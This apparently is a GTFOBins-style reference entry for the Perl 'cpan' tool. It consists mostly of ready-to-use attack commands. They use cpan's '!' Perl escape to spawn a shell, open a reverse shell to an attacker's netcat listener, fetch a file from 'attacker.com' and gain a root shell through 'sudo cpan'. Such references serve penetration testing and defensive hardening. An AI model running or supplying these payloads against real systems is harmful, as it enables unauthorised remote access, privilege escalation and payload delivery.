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`cpan` lets you execute perl commands with the `! command`.
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! exec '/bin/bash'
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Run `nc -lvp RPORT` on the attacker box to receive the shell. |
export RHOST=localhost
export RPORT=9000
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! use Socket; my $i="$ENV{RHOST}"; my $p=$ENV{RPORT}; socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp")); if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S"); open(STDOUT,">&S"); open(STDERR,">&S"); exec("/bin/sh -i");};
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Serve files in the local folder running an HTTP server on port 8080. Install the dependency via `cpan HTTP::Server::Simple`. |
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! use HTTP::Server::Simple; my $server= HTTP::Server::Simple->new(); $server->run();
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Fetch a remote file via an HTTP GET request and store it in `PWD`. |
export URL=http://attacker.com/file_to_get
cpan
! use File::Fetch; my $file = (File::Fetch->new(uri => "$ENV{URL}"))->fetch();
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sudo cpan
! exec '/bin/bash'
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